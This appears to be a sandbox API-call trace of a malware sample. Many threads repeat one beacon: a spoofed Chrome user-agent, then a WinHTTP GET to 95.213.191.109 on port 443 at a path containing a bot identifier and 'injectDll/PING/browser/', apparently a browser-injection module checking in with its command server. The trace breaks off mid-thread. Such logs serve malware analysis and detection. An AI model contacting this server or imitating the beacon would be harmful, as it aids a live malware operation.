	[0238.153] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5418
	[0238.153] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0238.153] WinHttpConnect (hSession=0x22c5418, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5078
	[0238.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c7e8
	[0238.154] WinHttpSetTimeouts (hInternet=0x22c5418, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0238.154] WinHttpOpenRequest (hConnect=0x22c5078, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e8160
	[0238.154] WinHttpSetOption (hInternet=0x27e8160, dwOption=0x1f, lpBuffer=0x268f234, dwBufferLength=0x4) returned 1
	[0238.154] WinHttpSendRequest (hRequest=0x27e8160, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0238.583] WinHttpReceiveResponse (hRequest=0x27e8160, lpReserved=0x0) returned 1
	[0238.583] WinHttpQueryHeaders (in: hRequest=0x27e8160, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f224, lpdwBufferLength=0x268f220, lpdwIndex=0x0 | out: lpBuffer=0x268f224*, lpdwBufferLength=0x268f220*=0x4, lpdwIndex=0x0) returned 1
	[0238.583] Sleep (dwMilliseconds=0xbb8) 
	[0241.582] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0241.583] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff48) returned 1
	[0241.583] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778758) returned 1
	[0241.583] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27782f8) returned 1
	[0241.583] WinHttpCloseHandle (hInternet=0x27e8160) returned 1
	[0241.583] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0241.583] WinHttpCloseHandle (hInternet=0x22c5418) returned 1
	[0241.583] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c7e8) returned 1

Thread:
	id = 344
	os_tid = 0xbac

	[0238.640] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c56d0
	[0238.641] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0238.641] WinHttpConnect (hSession=0x22c56d0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5fe0
	[0238.641] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ea8
	[0238.641] WinHttpSetTimeouts (hInternet=0x22c56d0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0238.641] WinHttpOpenRequest (hConnect=0x22c5fe0, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e8408
	[0238.641] WinHttpSetOption (hInternet=0x27e8408, dwOption=0x1f, lpBuffer=0x2edf234, dwBufferLength=0x4) returned 1
	[0238.642] WinHttpSendRequest (hRequest=0x27e8408, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0239.094] WinHttpReceiveResponse (hRequest=0x27e8408, lpReserved=0x0) returned 1
	[0239.094] WinHttpQueryHeaders (in: hRequest=0x27e8408, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2edf224, lpdwBufferLength=0x2edf220, lpdwIndex=0x0 | out: lpBuffer=0x2edf224*, lpdwBufferLength=0x2edf220*=0x4, lpdwIndex=0x0) returned 1
	[0239.094] Sleep (dwMilliseconds=0xbb8) 
	[0242.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737e08) returned 1
	[0242.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7a10) returned 1
	[0242.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27382e0) returned 1
	[0242.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f20) returned 1
	[0242.097] WinHttpCloseHandle (hInternet=0x27e8408) returned 1
	[0242.097] WinHttpCloseHandle (hInternet=0x22c5fe0) returned 1
	[0242.098] WinHttpCloseHandle (hInternet=0x22c56d0) returned 1
	[0242.098] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ea8) returned 1

Thread:
	id = 348
	os_tid = 0x604

	[0239.370] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6298
	[0239.370] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0239.370] WinHttpConnect (hSession=0x22c6298, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c6380
	[0239.370] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfa18
	[0239.370] WinHttpSetTimeouts (hInternet=0x22c6298, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0239.370] WinHttpOpenRequest (hConnect=0x22c6380, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e86b0
	[0239.371] WinHttpSetOption (hInternet=0x27e86b0, dwOption=0x1f, lpBuffer=0x31ef234, dwBufferLength=0x4) returned 1
	[0239.371] WinHttpSendRequest (hRequest=0x27e86b0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0241.045] WinHttpReceiveResponse (hRequest=0x27e86b0, lpReserved=0x0) returned 1
	[0241.045] WinHttpQueryHeaders (in: hRequest=0x27e86b0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x31ef224, lpdwBufferLength=0x31ef220, lpdwIndex=0x0 | out: lpBuffer=0x31ef224*, lpdwBufferLength=0x31ef220*=0x4, lpdwIndex=0x0) returned 1
	[0241.045] Sleep (dwMilliseconds=0xbb8) 
	[0244.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0244.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7a28) returned 1
	[0244.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27beff0) returned 1
	[0244.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0244.097] WinHttpCloseHandle (hInternet=0x27e86b0) returned 1
	[0244.097] WinHttpCloseHandle (hInternet=0x22c6380) returned 1
	[0244.097] WinHttpCloseHandle (hInternet=0x22c6298) returned 1
	[0244.098] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfa18) returned 1

Thread:
	id = 349
	os_tid = 0x680

	[0239.891] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6638
	[0239.891] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0239.891] WinHttpConnect (hSession=0x22c6638, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c6720
	[0239.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c00d0
	[0239.891] WinHttpSetTimeouts (hInternet=0x22c6638, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0239.891] WinHttpOpenRequest (hConnect=0x22c6720, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e76c0
	[0239.892] WinHttpSetOption (hInternet=0x27e76c0, dwOption=0x1f, lpBuffer=0x32ef234, dwBufferLength=0x4) returned 1
	[0239.892] WinHttpSendRequest (hRequest=0x27e76c0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0241.286] WinHttpReceiveResponse (hRequest=0x27e76c0, lpReserved=0x0) returned 1
	[0241.286] WinHttpQueryHeaders (in: hRequest=0x27e76c0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x32ef224, lpdwBufferLength=0x32ef220, lpdwIndex=0x0 | out: lpBuffer=0x32ef224*, lpdwBufferLength=0x32ef220*=0x4, lpdwIndex=0x0) returned 1
	[0241.286] Sleep (dwMilliseconds=0xbb8) 
	[0244.299] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2628) returned 1
	[0244.299] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d328) returned 1
	[0244.299] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2600) returned 1
	[0244.299] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c25d8) returned 1
	[0244.299] WinHttpCloseHandle (hInternet=0x27e76c0) returned 1
	[0244.299] WinHttpCloseHandle (hInternet=0x22c6720) returned 1
	[0244.299] WinHttpCloseHandle (hInternet=0x22c6638) returned 1
	[0244.300] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00d0) returned 1

Thread:
	id = 354
	os_tid = 0xb0

	[0242.877] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c56d0
	[0242.878] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0242.878] WinHttpConnect (hSession=0x22c56d0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5fe0
	[0242.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0670
	[0242.878] WinHttpSetTimeouts (hInternet=0x22c56d0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0242.878] WinHttpOpenRequest (hConnect=0x22c5fe0, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e8408
	[0242.878] WinHttpSetOption (hInternet=0x27e8408, dwOption=0x1f, lpBuffer=0x268f234, dwBufferLength=0x4) returned 1
	[0242.878] WinHttpSendRequest (hRequest=0x27e8408, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0243.236] WinHttpReceiveResponse (hRequest=0x27e8408, lpReserved=0x0) returned 1
	[0243.237] WinHttpQueryHeaders (in: hRequest=0x27e8408, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f224, lpdwBufferLength=0x268f220, lpdwIndex=0x0 | out: lpBuffer=0x268f224*, lpdwBufferLength=0x268f220*=0x4, lpdwIndex=0x0) returned 1
	[0243.237] Sleep (dwMilliseconds=0xbb8) 
	[0246.247] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c08f0) returned 1
	[0246.247] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff48) returned 1
	[0246.247] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0918) returned 1
	[0246.247] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0580) returned 1
	[0246.247] WinHttpCloseHandle (hInternet=0x27e8408) returned 1
	[0246.247] WinHttpCloseHandle (hInternet=0x22c5fe0) returned 1
	[0246.247] WinHttpCloseHandle (hInternet=0x22c56d0) returned 1
	[0246.248] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1

Thread:
	id = 355
	os_tid = 0xde0

	[0243.396] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5078
	[0243.396] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0243.396] WinHttpConnect (hSession=0x22c5078, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5418
	[0243.396] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf680
	[0243.396] WinHttpSetTimeouts (hInternet=0x22c5078, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0243.396] WinHttpOpenRequest (hConnect=0x22c5418, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e8160
	[0243.396] WinHttpSetOption (hInternet=0x27e8160, dwOption=0x1f, lpBuffer=0x2d8f234, dwBufferLength=0x4) returned 1
	[0243.396] WinHttpSendRequest (hRequest=0x27e8160, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0243.772] WinHttpReceiveResponse (hRequest=0x27e8160, lpReserved=0x0) returned 1
	[0243.773] WinHttpQueryHeaders (in: hRequest=0x27e8160, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2d8f224, lpdwBufferLength=0x2d8f220, lpdwIndex=0x0 | out: lpBuffer=0x2d8f224*, lpdwBufferLength=0x2d8f220*=0x4, lpdwIndex=0x0) returned 1
	[0243.773] Sleep (dwMilliseconds=0xbb8) 
	[0246.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0828) returned 1
	[0246.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffdf8) returned 1
	[0246.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c07b0) returned 1
	[0246.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0246.778] WinHttpCloseHandle (hInternet=0x27e8160) returned 1
	[0246.778] WinHttpCloseHandle (hInternet=0x22c5418) returned 1
	[0246.778] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0246.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1

Thread:
	id = 356
	os_tid = 0xde8

	[0243.918] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5e10
	[0243.918] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0243.919] WinHttpConnect (hSession=0x22c5e10, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5ef8
	[0243.919] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c01e8
	[0243.919] WinHttpSetTimeouts (hInternet=0x22c5e10, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0243.919] WinHttpOpenRequest (hConnect=0x22c5ef8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7eb8
	[0243.919] WinHttpSetOption (hInternet=0x27e7eb8, dwOption=0x1f, lpBuffer=0x2edf234, dwBufferLength=0x4) returned 1
	[0243.919] WinHttpSendRequest (hRequest=0x27e7eb8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0244.509] WinHttpReceiveResponse (hRequest=0x27e7eb8, lpReserved=0x0) returned 1
	[0244.509] WinHttpQueryHeaders (in: hRequest=0x27e7eb8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2edf224, lpdwBufferLength=0x2edf220, lpdwIndex=0x0 | out: lpBuffer=0x2edf224*, lpdwBufferLength=0x2edf220*=0x4, lpdwIndex=0x0) returned 1
	[0244.509] Sleep (dwMilliseconds=0xbb8) 
	[0247.528] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00a8) returned 1
	[0247.528] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff00) returned 1
	[0247.528] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0558) returned 1
	[0247.528] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0247.528] WinHttpCloseHandle (hInternet=0x27e7eb8) returned 1
	[0247.528] WinHttpCloseHandle (hInternet=0x22c5ef8) returned 1
	[0247.528] WinHttpCloseHandle (hInternet=0x22c5e10) returned 1
	[0247.528] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01e8) returned 1

Thread:
	id = 357
	os_tid = 0xdec

	[0244.407] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6638
	[0244.407] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0244.407] WinHttpConnect (hSession=0x22c6638, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c6720
	[0244.407] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0328
	[0244.407] WinHttpSetTimeouts (hInternet=0x22c6638, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0244.407] WinHttpOpenRequest (hConnect=0x22c6720, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e76c0
	[0244.407] WinHttpSetOption (hInternet=0x27e76c0, dwOption=0x1f, lpBuffer=0x31ef234, dwBufferLength=0x4) returned 1
	[0244.407] WinHttpSendRequest (hRequest=0x27e76c0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0244.796] WinHttpReceiveResponse (hRequest=0x27e76c0, lpReserved=0x0) returned 1
	[0244.796] WinHttpQueryHeaders (in: hRequest=0x27e76c0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x31ef224, lpdwBufferLength=0x31ef220, lpdwIndex=0x0 | out: lpBuffer=0x31ef224*, lpdwBufferLength=0x31ef220*=0x4, lpdwIndex=0x0) returned 1
	[0244.796] Sleep (dwMilliseconds=0xbb8) 
	[0247.838] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0058) returned 1
	[0247.838] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e15e8) returned 1
	[0247.838] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0300) returned 1
	[0247.838] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00d0) returned 1
	[0247.838] WinHttpCloseHandle (hInternet=0x27e76c0) returned 1
	[0247.838] WinHttpCloseHandle (hInternet=0x22c6720) returned 1
	[0247.838] WinHttpCloseHandle (hInternet=0x22c6638) returned 1
	[0247.838] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0328) returned 1

Thread:
	id = 358
	os_tid = 0xe18

	[0244.967] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6298
	[0244.967] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0244.967] WinHttpConnect (hSession=0x22c6298, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c6380
	[0244.967] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778410
	[0244.967] WinHttpSetTimeouts (hInternet=0x22c6298, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0244.967] WinHttpOpenRequest (hConnect=0x22c6380, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e86b0
	[0244.967] WinHttpSetOption (hInternet=0x27e86b0, dwOption=0x1f, lpBuffer=0x32ef234, dwBufferLength=0x4) returned 1
	[0244.968] WinHttpSendRequest (hRequest=0x27e86b0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0245.345] WinHttpReceiveResponse (hRequest=0x27e86b0, lpReserved=0x0) returned 1
	[0245.345] WinHttpQueryHeaders (in: hRequest=0x27e86b0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x32ef224, lpdwBufferLength=0x32ef220, lpdwIndex=0x0 | out: lpBuffer=0x32ef224*, lpdwBufferLength=0x32ef220*=0x4, lpdwIndex=0x0) returned 1
	[0245.345] Sleep (dwMilliseconds=0xbb8) 
	[0248.400] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778c30) returned 1
	[0248.400] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffc30) returned 1
	[0248.400] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778d98) returned 1
	[0248.400] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0248.400] WinHttpCloseHandle (hInternet=0x27e86b0) returned 1
	[0248.400] WinHttpCloseHandle (hInternet=0x22c6380) returned 1
	[0248.400] WinHttpCloseHandle (hInternet=0x22c6298) returned 1
	[0248.400] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778410) returned 1

Thread:
	id = 359
	os_tid = 0xe1c

	[0245.483] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6ac0
	[0245.483] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0245.483] WinHttpConnect (hSession=0x22c6ac0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c6ba8
	[0245.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778af0
	[0245.483] WinHttpSetTimeouts (hInternet=0x22c6ac0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0245.483] WinHttpOpenRequest (hConnect=0x22c6ba8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7c10
	[0245.484] WinHttpSetOption (hInternet=0x27e7c10, dwOption=0x1f, lpBuffer=0x33ef234, dwBufferLength=0x4) returned 1
	[0245.484] WinHttpSendRequest (hRequest=0x27e7c10, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0245.848] WinHttpReceiveResponse (hRequest=0x27e7c10, lpReserved=0x0) returned 1
	[0245.848] WinHttpQueryHeaders (in: hRequest=0x27e7c10, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33ef224, lpdwBufferLength=0x33ef220, lpdwIndex=0x0 | out: lpBuffer=0x33ef224*, lpdwBufferLength=0x33ef220*=0x4, lpdwIndex=0x0) returned 1
	[0245.848] Sleep (dwMilliseconds=0xbb8) 
	[0248.883] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778de8) returned 1
	[0248.883] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1810) returned 1
	[0248.883] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778898) returned 1
	[0248.884] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0248.884] WinHttpCloseHandle (hInternet=0x27e7c10) returned 1
	[0248.884] WinHttpCloseHandle (hInternet=0x22c6ba8) returned 1
	[0248.884] WinHttpCloseHandle (hInternet=0x22c6ac0) returned 1
	[0248.884] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778af0) returned 1

Thread:
	id = 360
	os_tid = 0xdf0

	[0246.029] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6808
	[0246.029] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0246.029] WinHttpConnect (hSession=0x22c6808, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5b58
	[0246.029] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27784b0
	[0246.029] WinHttpSetTimeouts (hInternet=0x22c6808, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0246.029] WinHttpOpenRequest (hConnect=0x22c5b58, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e8958
	[0246.030] WinHttpSetOption (hInternet=0x27e8958, dwOption=0x1f, lpBuffer=0x34ef234, dwBufferLength=0x4) returned 1
	[0246.030] WinHttpSendRequest (hRequest=0x27e8958, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0246.825] WinHttpReceiveResponse (hRequest=0x27e8958, lpReserved=0x0) returned 1
